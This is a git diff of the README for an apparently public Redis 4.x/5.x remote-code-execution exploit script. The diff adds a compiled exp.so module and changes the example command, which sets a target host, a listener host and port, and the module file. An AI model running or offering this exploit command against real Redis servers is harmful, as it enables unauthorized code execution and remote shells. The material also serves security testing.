diff --git a/README.md b/README.md index 578e34b..89b5abb 100644 --- a/README.md +++ b/README.md @@ -5,9 +5,6 @@ A exploit for Redis 4.x/5.x RCE, inspired by [Redis post-exploitation](https://2 This repo is a modified version of . ## Usage: -Compile exp.so from . - - ``` usage: redis-rce.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE] [-a AUTH] [-v] @@ -31,11 +28,8 @@ optional arguments: ## example: ``` -python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f exp.so +python redis-rce.py -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 1337 -f exp.so ``` +![image](https://user-images.githubusercontent.com/55566953/136344910-e2afabce-fa9d-4995-b911-cd2cb3b7dd84.png) -![](https://blogpics-1251691280.file.myqcloud.com/imgs/20190708220258.png) - -The default target port is 6379 and the default vps port is 21000. -And you will get an interactive shell! diff --git a/exp.so b/exp.so new file mode 100644 index 0000000..b29439d Binary files /dev/null and b/exp.so differ